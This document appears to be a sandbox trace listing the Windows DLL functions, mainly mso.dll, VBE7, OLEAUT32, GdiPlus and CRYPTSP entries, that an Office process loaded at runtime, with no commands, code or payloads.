DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: VBE7.DLL/DllVbeInit
DynamicLoader: mso.dll/_MsoInitGimme@12
DynamicLoader: mso.dll/_MsoFGimmeFeatureEx@8
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@24
DynamicLoader: mso.dll/_MsoFGimmeComponentEx@20
DynamicLoader: mso.dll/_MsoFGimmeFileEx@24
DynamicLoader: mso.dll/_MsoFGimmeFileEx@20
DynamicLoader: mso.dll/_MsoSetLVProperty@8
DynamicLoader: mso.dll/_MsoVBADigSigCallDlg@20
DynamicLoader: mso.dll/_MsoVbaInitSecurity@4
DynamicLoader: mso.dll/_MsoFIEPolicyAndVersion@8
DynamicLoader: mso.dll/_MsoFUseIEFeature@8
DynamicLoader: mso.dll/_MsoFAnsiCodePageSupportsLCID@8
DynamicLoader: mso.dll/_MsoFInitOffice@20
DynamicLoader: mso.dll/_MsoUninitOffice@4
DynamicLoader: mso.dll/_MsoFGetFontSettings@20
DynamicLoader: mso.dll/_MsoRgchToRgwch@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface@16
DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface2@20
DynamicLoader: mso.dll/_MsoFCreateControl@36
DynamicLoader: mso.dll/_MsoFLongLoad@8
DynamicLoader: mso.dll/_MsoFLongSave@8
DynamicLoader: mso.dll/_MsoFGetTooltips@0
DynamicLoader: mso.dll/_MsoFSetTooltips@4
DynamicLoader: mso.dll/_MsoFLoadToolbarSet@24
DynamicLoader: mso.dll/_MsoFCreateToolbarSet@28
DynamicLoader: mso.dll/_MsoInitShrGlobal@4
DynamicLoader: mso.dll/_MsoHpalOffice@0
DynamicLoader: mso.dll/_MsoFWndProcNeeded@4
DynamicLoader: mso.dll/_MsoFWndProc@24
DynamicLoader: mso.dll/_MsoFCreateITFCHwnd@20
DynamicLoader: mso.dll/_MsoDestroyITFC@4
DynamicLoader: mso.dll/_MsoFPitbsFromHwndAndMsg@12
DynamicLoader: mso.dll/_MsoFGetComponentManager@4
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: mso.dll/_MsoWideCharToMultiByte@32
DynamicLoader: mso.dll/_MsoHrRegisterAll@0
DynamicLoader: mso.dll/_MsoFSetComponentManager@4
DynamicLoader: mso.dll/_MsoFCreateStdComponentManager@20
DynamicLoader: mso.dll/_MsoFHandledMessageNeeded@4
DynamicLoader: mso.dll/_MsoPeekMessage@8
DynamicLoader: mso.dll/_MsoGetWWWCmdInfo@20
DynamicLoader: mso.dll/_MsoFExecWWWHelp@8
DynamicLoader: mso.dll/_MsoFCreateIPref@28
DynamicLoader: mso.dll/_MsoDestroyIPref@4
DynamicLoader: mso.dll/_MsoChsFromLid@4
DynamicLoader: mso.dll/_MsoCpgFromChs@4
DynamicLoader: mso.dll/_MsoSetLocale@4
DynamicLoader: mso.dll/_MsoFSetHMsoinstOfSdm@4
DynamicLoader: mso.dll/_MsoVBADigSig2CallDlgEx@28
DynamicLoader: mso.dll/_MsoVbaInitSecurityEx@4
DynamicLoader: OLEAUT32.dll/SysFreeString
DynamicLoader: OLEAUT32.dll/LoadTypeLib
DynamicLoader: OLEAUT32.dll/RegisterTypeLib
DynamicLoader: OLEAUT32.dll/QueryPathOfRegTypeLib
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/OleTranslateColor
DynamicLoader: OLEAUT32.dll/OleCreateFontIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePictureIndirect
DynamicLoader: OLEAUT32.dll/OleLoadPicture
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrameIndirect
DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrame
DynamicLoader: OLEAUT32.dll/OleIconToCursor
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/RegisterTypeLibForUser
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ole32.dll/OleInitialize
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: VBE7.DLL/
DynamicLoader: VBE7.DLL/
DynamicLoader: VBE7.DLL/
DynamicLoader: VBE7.DLL/
DynamicLoader: VBE7.DLL/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GdiTransparentBlt
DynamicLoader: GDI32.dll/GdiAlphaBlend
DynamicLoader: GDI32.dll/GdiGradientFill
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: GdiPlus.dll/GdiplusStartup
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: USER32.dll/GetWindowInfo
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/EnumDisplayDevicesA
DynamicLoader: GDI32.dll/ExtTextOutW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: GdiPlus.dll/GdipDeletePath
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreatePath
DynamicLoader: GdiPlus.dll/GdipStartPathFigure
DynamicLoader: GdiPlus.dll/GdipAddPathLine2
DynamicLoader: GdiPlus.dll/GdipClosePathFigure
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipClonePath
DynamicLoader: GdiPlus.dll/GdipCreateMatrix2
DynamicLoader: GdiPlus.dll/GdipTransformPath
DynamicLoader: GdiPlus.dll/GdipDeleteMatrix
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipAddPathPolygon
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetPathWorldBounds
DynamicLoader: GdiPlus.dll/GdipCreatePen1
DynamicLoader: GdiPlus.dll/GdipSetPenLineCap197819
DynamicLoader: GdiPlus.dll/GdipSetPenLineJoin
DynamicLoader: GdiPlus.dll/GdipSetPenMiterLimit
DynamicLoader: GdiPlus.dll/GdipCreatePathIter
DynamicLoader: GdiPlus.dll/GdipPathIterRewind
DynamicLoader: GdiPlus.dll/GdipPathIterNextSubpath
DynamicLoader: GdiPlus.dll/GdipPathIterCopyData
DynamicLoader: GdiPlus.dll/GdipDeletePathIter
DynamicLoader: GdiPlus.dll/GdipAddPathLine
DynamicLoader: GdiPlus.dll/GdipClonePen
DynamicLoader: GdiPlus.dll/GdipSetPenStartCap
DynamicLoader: GdiPlus.dll/GdipSetPenEndCap
DynamicLoader: GdiPlus.dll/GdipDeletePen
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateFromHDC
DynamicLoader: GdiPlus.dll/GdipSetPixelOffsetMode
DynamicLoader: GdiPlus.dll/GdipSetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipSetCompositingQuality
DynamicLoader: GdiPlus.dll/GdipSetPageUnit
DynamicLoader: GdiPlus.dll/GdipSetInterpolationMode
DynamicLoader: GdiPlus.dll/GdipGetSmoothingMode
DynamicLoader: GdiPlus.dll/GdipTransformPoints
DynamicLoader: GdiPlus.dll/GdipCreateMetafileFromWmfFile
DynamicLoader: GdiPlus.dll/GdipCreateImageAttributes
DynamicLoader: GdiPlus.dll/GdipSetImageAttributesWrapMode
DynamicLoader: GdiPlus.dll/GdipGetImageType
DynamicLoader: GdiPlus.dll/GdipGetMetafileHeaderFromMetafile
DynamicLoader: GdiPlus.dll/GdipConvertToEmfPlus
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryInfoKeyA
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: kernel32.dll/RegCreateKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: GdiPlus.dll/GdipGetImageBounds
DynamicLoader: GdiPlus.dll/GdipGetInterpolationMode
DynamicLoader: GdiPlus.dll/GdipDrawImagePointsRect
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDisposeImageAttributes
DynamicLoader: GdiPlus.dll/GdipDisposeImage
DynamicLoader: GdiPlus.dll/GdipDeleteGraphics
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptItemizeOpenType
DynamicLoader: USP10.DLL/ScriptShapeOpenType
DynamicLoader: USP10.DLL/ScriptPlaceOpenType
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipAddPathRectangle
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateSolidFill
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetSolidFillColor
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetPointCount
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetVisibleClipBoundsI
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateMatrix
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetMatrixElements
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetTextRenderingHint
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipResetWorldTransform
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipCreateRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetClip
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetClipRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDeleteRegion
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipSetClipRectI
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptItemize
DynamicLoader: USP10.DLL/ScriptPlace
DynamicLoader: USP10.DLL/ScriptShape
DynamicLoader: USP10.DLL/ScriptItemizeOpenType
DynamicLoader: USP10.DLL/ScriptPlaceOpenType
DynamicLoader: USP10.DLL/ScriptShapeOpenType
DynamicLoader: USP10.DLL/ScriptJustify
DynamicLoader: USP10.DLL/ScriptTextOut
DynamicLoader: USP10.DLL/ScriptCPtoX
DynamicLoader: USP10.DLL/ScriptXtoCP
DynamicLoader: USP10.DLL/ScriptFreeCache
DynamicLoader: USP10.DLL/ScriptCacheGetHeight
DynamicLoader: USP10.DLL/ScriptGetCMap
DynamicLoader: USP10.DLL/ScriptLayout
DynamicLoader: USP10.DLL/ScriptBreak
DynamicLoader: USP10.DLL/ScriptIsComplex
DynamicLoader: USP10.DLL/ScriptGetFontFeatureTags
DynamicLoader: USP10.DLL/ScriptGetFontScriptTags
DynamicLoader: USP10.DLL/ScriptGetFontLanguageTags
DynamicLoader: USP10.DLL/ScriptGetLogicalWidths
DynamicLoader: USP10.DLL/ScriptApplyLogicalWidth
DynamicLoader: USP10.DLL/ScriptGetGlyphABCWidth
DynamicLoader: USP10.DLL/ScriptCacheGetHeight
DynamicLoader: USP10.DLL/ScriptGetGlyphABCWidth
DynamicLoader: USP10.DLL/ScriptGetFontProperties
DynamicLoader: USP10.DLL/ScriptApplyDigitSubstitution
DynamicLoader: USP10.DLL/ScriptRecordDigitSubstitution
DynamicLoader: USP10.DLL/ScriptGetProperties
DynamicLoader: USP10.DLL/ScriptGetFontAlternateGlyphs
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetRegionHRgn
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetDC
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipGetMatrixElements
DynamicLoader: mso.dll/
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipReleaseDC
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: GdiPlus.dll/GdipDeleteBrush
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: GdiPlus.dll/GdipLoadImageFromStreamICM
DynamicLoader: WindowsCodecs.dll/DllGetClassObject
DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
DynamicLoader: GdiPlus.dll/GdipGetImageRawFormat
DynamicLoader: GdiPlus.dll/GdipGetImageFlags
DynamicLoader: GdiPlus.dll/GdipGetImageWidth
DynamicLoader: GdiPlus.dll/GdipGetImageHeight
DynamicLoader: GdiPlus.dll/GdipGetImagePixelFormat
DynamicLoader: GdiPlus.dll/GdipGetImageHorizontalResolution
DynamicLoader: GdiPlus.dll/GdipGetImageVerticalResolution
DynamicLoader: GdiPlus.dll/GdipImageGetFrameCount
DynamicLoader: GdiPlus.dll/GdipMultiplyWorldTransform
DynamicLoader: GdiPlus.dll/GdipCreateBitmapFromGdiDib
DynamicLoader: GdiPlus.dll/GdipCreateStringFormat
DynamicLoader: GdiPlus.dll/GdipSetStringFormatTrimming
DynamicLoader: GdiPlus.dll/GdipCreateFontFromLogfontA
DynamicLoader: GdiPlus.dll/GdipDrawString
DynamicLoader: GdiPlus.dll/GdipDeleteFont
DynamicLoader: GdiPlus.dll/GdipDeleteStringFormat
DynamicLoader: GdiPlus.dll/GdipDrawPath
DynamicLoader: GdiPlus.dll/GdipCreateBitmapFromGraphics
DynamicLoader: GdiPlus.dll/GdipGetImageGraphicsContext
DynamicLoader: GdiPlus.dll/GdipTranslateWorldTransform
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: GdiPlus.dll/GdipCreateCachedBitmap
DynamicLoader: GdiPlus.dll/GdipDrawCachedBitmap
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: msproof7.dll/DllGetClassObject
DynamicLoader: msproof7.dll/DllCanUnloadNow
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: riched20.dll/REMSOHInst
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: USP10.DLL/ScriptFreeCache
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: MSPTLS.DLL/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: VBE7.DLL/DllVbeTerm
DynamicLoader: VBE7.DLL/DllCanUnloadNow
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: USER32.dll/UnregisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: DwmApi.DLL/DwmIsCompositionEnabled
DynamicLoader: DwmApi.DLL/DwmGetColorizationColor
DynamicLoader: kernel32.dll/GetProductInfo
DynamicLoader: kernel32.dll/GetUserGeoID
DynamicLoader: msi.dll/DllGetVersion
DynamicLoader: GdiPlus.dll/GdipDeleteCachedBitmap
DynamicLoader: mso.dll/
DynamicLoader: mso.dll/
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: Comctl32.dll/
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetDefaultPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverPackagePathW
DynamicLoader: WINSPOOL.DRV/CorePrinterDriverInstalledW
DynamicLoader: WINSPOOL.DRV/GetCorePrinterDriversW
DynamicLoader: WINSPOOL.DRV/UploadPrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/InstallPrinterDriverFromPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/AddPrinterConnection2W
DynamicLoader: WINSPOOL.DRV/OpenPrinter2W
DynamicLoader: WINSPOOL.DRV/DeletePrinterKeyW
